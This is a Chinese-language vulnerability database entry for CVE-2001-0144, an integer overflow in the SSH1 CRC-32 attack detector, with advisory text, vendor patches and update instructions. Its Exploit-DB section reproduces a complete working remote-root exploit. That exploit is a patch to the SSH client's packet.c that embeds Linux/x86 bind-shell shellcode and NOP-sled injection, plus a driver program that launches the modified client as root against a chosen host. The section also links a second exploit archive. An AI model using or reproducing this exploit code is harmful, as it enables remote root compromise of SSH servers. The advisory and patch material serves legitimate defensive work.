CVE-2001-0144
CVSS10.0
发布时间 :2001-03-12 00:00:00
修订时间 :2016-10-17 22:10:01
NMCOE    

[原文]CORE SDI SSH1 CRC-32 compensation attack detector allows remote attackers to execute arbitrary commands on an SSH server or client via an integer overflow.


[CNNVD]SSH1守护程序crc32补偿攻击检测安全漏洞(CNNVD-200103-069)

        
        SSH是一种用于远程连接的加密通信协议和工具,相对telnet提供了强大得多的安全性。
        较新版本的ssh1守护程序中所带的一段代码中存在一个整数溢出问题。问题出在deattack.c,此程序由CORE SDI开发,用来防止SSH1协议受到CRC32补偿攻击。
        由于在detect_attack()函数中错误的将一个16位的无符号变量当成了32位变量来使用,导致表索引溢出问题。这将允许一个攻击者覆盖内存中的任意位置的内容,攻击者可能远程获取root权限。
        问题出在detect_attack()函数中:
        ...
        /*
         detect_attack
         Detects a crc32 compensation attack on a packet
        */
        int
        detect_attack(unsigned char *buf, word32 len, unsigned char *IV)
        {
         static word16 *h = (word16 *) NULL;
        (*) static word16 n = HASH_MINSIZE / HASH_ENTRYSIZE;
         register word32 i, j;
         word32 l;
        ...
        n 被错误的定义为16位整数,因此攻击者可以设法导致其值为0,在进行完xmalloc(0)分配后,将执行下列代码:
         for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
        由于i被设置为32位无符号整数,在n=0时,结果就变成了:
        i = HASH(c) & 0xffffffff
        而c可以由客户端提供。如果i的值超出了正常范围,程序在试图访问h[i]时将会发生段错误。
        通过精心构造攻击报文,攻击者可能覆盖任意地址的内容并远程执行任意代码。攻击者不需要有效的系统帐号即可进行攻击。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:openbsd:openssh:2.1OpenBSD OpenSSH 2.1
cpe:/a:openbsd:openssh:2.2OpenBSD OpenSSH 2.2
cpe:/a:ssh:ssh:1.2.30SSH Communications Security SSH daemon 1.2.30
cpe:/a:ssh:ssh:1.2.31SSH Communications Security SSH daemon 1.2.31
cpe:/a:openbsd:openssh:1.2.3OpenBSD OpenSSH 1.2.3
cpe:/a:ssh:ssh:1.2.24SSH Communications Security SSH daemon 1.2.24
cpe:/a:ssh:ssh:1.2.27SSH Communications Security SSH daemon 1.2.27
cpe:/a:ssh:ssh:1.2.28SSH Communications Security SSH daemon 1.2.28
cpe:/a:ssh:ssh:1.2.25SSH Communications Security SSH daemon 1.2.25
cpe:/a:openbsd:openssh:2.1.1OpenBSD OpenSSH 2.1.1
cpe:/a:ssh:ssh:1.2.26SSH Communications Security SSH daemon 1.2.26
cpe:/a:openbsd:openssh:1.2.2OpenBSD OpenSSH 1.2.2
cpe:/a:ssh:ssh:1.2.29SSH Communications Security SSH daemon 1.2.29

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5397Multiple Vendor SSH Buffer Overflow Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0144
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0144
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-069
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=98168366406903&w=2
(UNKNOWN)  BUGTRAQ  20010208 [CORE SDI ADVISORY] SSH1 CRC-32 compensation attack detector
http://razor.bindview.com/publish/advisories/adv_ssh1crc.html
(VENDOR_ADVISORY)  BINDVIEW  20010208 Remote vulnerability in SSH daemon crc32 compensation attack detector
http://www.cert.org/advisories/CA-2001-35.html
(UNKNOWN)  CERT  CA-2001-35
http://www.securityfocus.com/bid/2347
(VENDOR_ADVISORY)  BID  2347
http://xforce.iss.net/static/6083.php
(UNKNOWN)  XF  ssh-deattack-overwrite-memory(6083)

- 漏洞信息

SSH1守护程序crc32补偿攻击检测安全漏洞
危急 未知
2001-03-12 00:00:00 2006-09-05 00:00:00
远程  
        
        SSH是一种用于远程连接的加密通信协议和工具,相对telnet提供了强大得多的安全性。
        较新版本的ssh1守护程序中所带的一段代码中存在一个整数溢出问题。问题出在deattack.c,此程序由CORE SDI开发,用来防止SSH1协议受到CRC32补偿攻击。
        由于在detect_attack()函数中错误的将一个16位的无符号变量当成了32位变量来使用,导致表索引溢出问题。这将允许一个攻击者覆盖内存中的任意位置的内容,攻击者可能远程获取root权限。
        问题出在detect_attack()函数中:
        ...
        /*
         detect_attack
         Detects a crc32 compensation attack on a packet
        */
        int
        detect_attack(unsigned char *buf, word32 len, unsigned char *IV)
        {
         static word16 *h = (word16 *) NULL;
        (*) static word16 n = HASH_MINSIZE / HASH_ENTRYSIZE;
         register word32 i, j;
         word32 l;
        ...
        n 被错误的定义为16位整数,因此攻击者可以设法导致其值为0,在进行完xmalloc(0)分配后,将执行下列代码:
         for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
        由于i被设置为32位无符号整数,在n=0时,结果就变成了:
        i = HASH(c) & 0xffffffff
        而c可以由客户端提供。如果i的值超出了正常范围,程序在试图访问h[i]时将会发生段错误。
        通过精心构造攻击报文,攻击者可能覆盖任意地址的内容并远程执行任意代码。攻击者不需要有效的系统帐号即可进行攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如果您正在运行SSH2,并允许兼容SSH1,CNNVD建议您暂时禁止SSH1。
        * Michal Zalewski (lcamtuf@razor.bindview.com)也提供了下列的临时补丁程序:
        SSH1 software:
        8<---------------------patch for ssh-1.2.31---------------------------
        --- deattack.c.orig Wed Feb 7 13:53:47 2001
        +++ deattack.c Wed Feb 7 13:54:24 2001
        @@ -79,7 +79,7 @@
        detect_attack(unsigned char *buf, word32 len, unsigned char *IV)
        {
         static word16 *h = (word16 *) NULL;
        - static word16 n = HASH_MINSIZE / HASH_ENTRYSIZE;
        + static word32 n = HASH_MINSIZE / HASH_ENTRYSIZE;
         register word32 i, j;
         word32 l;
         register unsigned char *c;
        8<---------------------patch for ssh-1.2.31---------------------------
        Bjoern Groenvall's ossh (ftp://ftp.pdc.kth.se/pub/krypto/ossh/):
        8<---------------------patch for ossh-1.5.7---------------------------
        --- deattack.c.orig Wed Feb 7 14:11:23 2001
        +++ deattack.c Wed Feb 7 14:11:46 2001
        @@ -91,7 +91,7 @@
        detect_attack(const unsigned char *buf, word32 len)
        {
         static u_int16_t *h = (u_int16_t *) NULL;
        - static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
        + static u_int32_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
         register word32 i, j;
         word32 l;
         const unsigned char *c, *d;
        8<---------------------patch for ossh-1.5.7---------------------------
        OpenSSH 2.2.0:
        8<-------------------patch for openssh-2.2.0--------------------------
        --- deattack.c.orig Wed Feb 7 14:18:23 2001
        +++ deattack.c Wed Feb 7 14:19:33 2001
        @@ -84,7 +84,7 @@
        detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
        {
         static u_int16_t *h = (u_int16_t *) NULL;
        - static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
        + static u_int32_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
         register u_int32_t i, j;
         u_int32_t l;
         register unsigned char *c;
        8<-------------------patch for openssh-2.2.0--------------------------
        厂商补丁:
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-027-1)以及相应补丁:
        DSA-027-1:New OpenSSH packages released
        链接:
        http://www.debian.org/security/2001/dsa-027

        补丁下载:
        Source archives:
        
        http://security.debian.org/dists/stable/updates/main/source/openssh_1.2.3-9.2.diff.gz

        
        http://security.debian.org/dists/stable/updates/main/source/openssh_1.2.3-9.2.dsc

        
        http://security.debian.org/dists/stable/updates/main/source/openssh_1.2.3.orig.tar.gz

        Intel ia32 architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-i386/ssh-askpass-gnome_1.2.3-9.2_i386.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-i386/ssh_1.2.3-9.2_i386.deb

        Motorola 680x0 architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/ssh-askpass-gnome_1.2.3-9.2_m68k.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/ssh_1.2.3-9.2_m68k.deb

        Sun Sparc architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-sparc/ssh_1.2.3-9.2_sparc.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-sparc/ssh-askpass-gnome_1.2.3-9.2_sparc.deb

        Alpha architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/ssh-askpass-gnome_1.2.3-9.2_alpha.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/ssh_1.2.3-9.2_alpha.deb

        PowerPC architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-p

        补丁安装方法:
        1. 手工安装补丁包:
         首先,使用下面的命令来下载补丁软件:
         # wget url (url是补丁下载链接地址)
         然后,使用下面的命令来安装补丁:
         # dpkg -i file.deb (file是相应的补丁名)
        2. 使用apt-get自动安装补丁包:
         首先,使用下面的命令更新内部数据库:
         # apt-get update
        
         然后,使用下面的命令安装更新软件包:
         # apt-get upgrade
        OpenSSH
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.openssh.com/

        SSH Communications Security
        ---------------------------
        厂商已经在最新版本的软件中修补了这个安全漏洞,SSH公司建议您升级到2.x版本并禁止兼容SSH1,请到如下网站下载最新版本:
        
        http://www.ssh.com

- 漏洞信息 (349)

SSH (x2) Remote Root Exploit (EDBID:349)
multiple remote
2002-05-01 Verified
22 Teso
N/A [点击下载]
http://www.exploit-db.com/sploits/x2.tgz

# milw0rm.com [2002-05-01]
		

- 漏洞信息 (20617)

SSH 1.2.x CRC-32 Compensation Attack Detector Vulnerability (EDBID:20617)
unix remote
2001-02-08 Verified
0 Michal Zalewski
N/A [点击下载]
source: http://www.securityfocus.com/bid/2347/info

Secure Shell, or SSH, is an encrypted remote access protocol. SSH or code based on SSH is used by many systems all over the world and in a wide variety of commercial applications. An integer-overflow bug in the CRC32 compensation attack detection code may allow remote attackers to write values to arbitrary locations in memory.

This would occur in situations where large SSH packets are recieved by either a client or server, and a 32 bit representation of the SSH packet length is assigned to a 16 bit integer. The difference in data representation in these situations will cause the 16 bit variable to be assigned to zero (or a really low value).

As a result, future calls to malloc() as well as an index used to reference locations in memory can be corrupted by an attacker. This could occur in a manner that can be exploited to write certain numerical values to almost arbitrary locations in memory.

This can lead to an attacker executing arbitrary code with the privileges of the SSH server (usually root) or the SSH client.

**UPDATE**:

There have been reports suggesting that exploitation of this vulnerability may be widespread.

Since early september, independent, reliable sources have confirmed that this vulnerability is being exploited by attackers on the Internet. Security Focus does not currently have the exploit code being used, however this record will be updated if and when it becomes available.

NOTE: Cisco 11000 Content Service Switch family is vulnerable to this issue. All WebNS releases prior, but excluding, versions: 4.01 B42s, 4.10 22s, 5.0 B11s, 5.01 B6s, are vulnerable.

Secure Computing SafeWord Agent for SSH is reportedly prone to this issue, as it is based on a vulnerable version of SSH.

** NetScreen ScreenOS is not directly vulnerable to this issue, however the referenced exploit will cause devices using vulnerable versions of the software to stop functioning properly. This will result in a denial of service condition for NetScreen devices. This issue is in the Secure Command Shell (SCS) administrative interface, which is an implementation of SSHv1. SCS is not enabled on NetScreen devices by default. 

# Exploit code in the form of ssh client patches by Hugo Dias < bsphere@clix.pt >.

- --- packet.c Sat Oct 14 06:23:12 2000
+++ packet.c Tue Feb 20 09:33:00 2001
@@ -68,6 +68,85 @@
 #define DBG(x)
 #endif
 
+
+/*
+ *  Linux/x86
+ *  TCP/36864 portshell (old, could be optimized further)
+ */
+
+char shellcode[] = /* anathema <anathema@hack.co.za> */
+/* main: */
+"\xeb\x72"                                /* jmp callz               */
+/* start: */
+"\x5e"                                    /* popl %esi               */
+
+  /* socket() */
+"\x29\xc0"                                /* subl %eax, %eax         */
+"\x89\x46\x10"                            /* movl %eax, 0x10(%esi)   */
+"\x40"                                    /* incl %eax               */
+"\x89\xc3"                                /* movl %eax, %ebx         */
+"\x89\x46\x0c"                            /* movl %eax, 0x0c(%esi)   */
+"\x40"                                    /* incl %eax               */
+"\x89\x46\x08"                            /* movl %eax, 0x08(%esi)   */
+"\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
+"\xb0\x66"                                /* movb $0x66, %al         */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* bind() */
+"\x43"                                    /* incl %ebx               */
+"\xc6\x46\x10\x10"                        /* movb $0x10, 0x10(%esi)  */
+"\x66\x89\x5e\x14"                        /* movw %bx, 0x14(%esi)    */
+"\x88\x46\x08"                            /* movb %al, 0x08(%esi)    */
+"\x29\xc0"                                /* subl %eax, %eax         */
+"\x89\xc2"                                /* movl %eax, %edx         */
+"\x89\x46\x18"                            /* movl %eax, 0x18(%esi)   */
+"\xb0\x90"                                /* movb $0x90, %al         */
+"\x66\x89\x46\x16"                        /* movw %ax, 0x16(%esi)    */
+"\x8d\x4e\x14"                            /* leal 0x14(%esi), %ecx   */
+"\x89\x4e\x0c"                            /* movl %ecx, 0x0c(%esi)   */
+"\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
+"\xb0\x66"                                /* movb $0x66, %al         */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* listen() */
+"\x89\x5e\x0c"                            /* movl %ebx, 0x0c(%esi)   */
+"\x43"                                    /* incl %ebx               */
+"\x43"                                    /* incl %ebx               */
+"\xb0\x66"                                /* movb $0x66, %al         */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* accept() */
+"\x89\x56\x0c"                            /* movl %edx, 0x0c(%esi)   */
+"\x89\x56\x10"                            /* movl %edx, 0x10(%esi)   */
+"\xb0\x66"                                /* movb $0x66, %al         */
+"\x43"                                    /* incl %ebx               */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
+"\x86\xc3"                                /* xchgb %al, %bl          */
+"\xb0\x3f"                                /* movb $0x3f, %al         */
+"\x29\xc9"                                /* subl %ecx, %ecx         */
+"\xcd\x80"                                /* int $0x80               */
+"\xb0\x3f"                                /* movb $0x3f, %al         */
+"\x41"                                    /* incl %ecx               */
+"\xcd\x80"                                /* int $0x80               */
+"\xb0\x3f"                                /* movb $0x3f, %al         */
+"\x41"                                    /* incl %ecx               */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* execve() */
+"\x88\x56\x07"                            /* movb %dl, 0x07(%esi)    */
+"\x89\x76\x0c"                            /* movl %esi, 0x0c(%esi)   */
+"\x87\xf3"                                /* xchgl %esi, %ebx        */
+"\x8d\x4b\x0c"                            /* leal 0x0c(%ebx), %ecx   */
+"\xb0\x0b"                                /* movb $0x0b, %al         */
+"\xcd\x80"                                /* int $0x80               */
+
+/* callz: */
+"\xe8\x89\xff\xff\xff"                    /* call start              */
+"/bin/sh";
+
+
 /*
  * This variable contains the file descriptors used for communicating with
  * the other side.  connection_in is used for reading; connection_out for
@@ -125,6 +204,9 @@
 /* Session key information for Encryption and MAC */
 Kex *kex = NULL;
 
+/* Packet Number */
+int count = 0;
+
 void
 packet_set_kex(Kex *k)
 {
@@ -461,6 +543,8 @@
  unsigned int checksum;
  u_int32_t rand = 0;
 
+ count++;
+
  /*
   * If using packet compression, compress the payload of the outgoing
   * packet.
@@ -1172,7 +1256,64 @@
 void
 packet_write_poll()
 {
- - int len = buffer_len(&output);
+ int len;
+ char buf[50],*p,*ptr;
+ char code[270000];
+ long sz;
+ FILE *f; 
+
+ if (count == 2)
+ {
+  f = fopen("/tmp/code","r");
+  fgets(buf,28,f); 
+  fclose(f);  
+
+  sz = GET_32BIT(&buf[24]);
+  buffer_clear(&output);
+  buffer_append(&output,code,sz); 
+ 
+  len = buffer_len(&output);
+
+    ptr = buffer_ptr(&output); 
+
+  for(p = ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=8)
+  {
+  *p=buf[0];
+  *(p+1)=buf[1];
+  *(p+2)=buf[2];
+  *(p+3)=buf[3];
+  *(p+4)=buf[4];
+  *(p+5)=buf[5];
+  *(p+6)=buf[6];
+  *(p+7)=buf[7];
+  }
+
+  sz = ((GET_32BIT(&buf[20]) + 8) & ~7);
+
+  for(p = p ; p < ptr + sz ; p+=8)
+  {
+  *p=buf[8];
+  *(p+1)=buf[9];
+  *(p+2)=buf[10];
+  *(p+3)=buf[11];
+  *(p+4)=buf[12];
+  *(p+5)=buf[13];
+  *(p+6)=buf[14];
+  *(p+7)=buf[15];
+  }
+
+  sz = len - GET_32BIT(&buf[20]);
+ 
+  memset(p,'\x90',sz);
+  memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));
+  memcpy(ptr,&buf[20],4); 
+
+  count++;
+ }
+
+ len = buffer_len(&output);
+
+
  if (len > 0) {
   len = write(connection_out, buffer_ptr(&output), len);
   if (len <= 0) {
@@ -1299,3 +1440,4 @@
  max_packet_size = s;
  return s;
 }
+

- ------------------------------------------------------------------------------------

/* 

THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.

BlackSphere - Hugo Oliveira Dias
Tue Feb 20 16:18:00 2001

Email: bsphere@clix.pt
Homepage: http://planeta.clix.pt/bsphere

Exploit code for using the modified ssh

*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* Path to modified ssh */
#define PATH_SSH "./ssh"

int main(int argc,char *argv[])
{
 int f;
 int port;
 unsigned long addr,*ptr;
 char *buffer,*aux,ch,*ssh;
 int i;

 if (argc < 8)
 {
  printf("\nUsage : %s <saved eip> <count> <packet length> <username length> <host> \
<port> <h(i)>\n\n",argv[0]);
 
  fflush(stdout);
  _exit(0);
 }

 port=atoi(argv[6]);

 buffer = (char *) malloc(29);

 ptr = (unsigned long *) buffer;

 *(ptr++) = 1543007393 + strtoul(argv[1],0,10);
 *(ptr++) = 0;
 *(ptr++) = strtoul(argv[7],0,10);
 *(ptr++) = 0;
 *(ptr++) = 16520 + strtoul(argv[2],0,10);
 *(ptr++) = strtoul(argv[3],0,10);
 *(ptr++) = strtoul(argv[4],0,10);

 buffer[29]=0;

 for(i = 0 ; i < 27 ; i+=4)
 {
  aux = buffer + i;
  ch=*aux;
  *aux=*(aux+3);
  *(aux+3)=ch;
  ch=*(aux+1);
  *(aux+1)=*(aux+2);
  *(aux+2)=ch; 
 } 

 printf("\nSaved Eip : &h + %u",1543007393 + strtoul(argv[1],0,10));
 printf("\nReturn Address : 0x%xxxxx",(16520+strtoul(argv[2],0,10))/8);
 printf("\nPacket Length : %u",(strtoul(argv[3],0,10)+8) & ~7);
 printf("\nUsername Length : %u\n\n",strtoul(argv[4],0,10));
 fflush(stdout);
 

 f = open("/tmp/code",O_RDWR | O_CREAT,S_IRWXU);
 write(f,buffer,28);
 close(f);

 ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5]));

 strcpy(ssh,PATH_SSH);

 sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root %s",port,argv[5]);
 
 printf("%s\n",ssh);

 system(ssh);

 _exit(0); 
}


		

- 漏洞信息

795
Multiple Vendor SSH CRC-32 detect_attack() Function Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in SSH and OpenSSH and derived products. The implementation of SSH protocol version 1.5 fails to correctly calculate the range within deattack.c's detect_attack function, resulting in an integer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code as UID 0, resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2001-02-08 Unknow
2001-02-21 Unknow

- 解决方案

Upgrade to the appropriate version from your vendor; you must contact your vendor for the fixed version. It is usually also possible to correct the flaw by disabling support for version 1 of the SSH protocol in your configuration. Again, exact details will vary from vendor to vendor.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站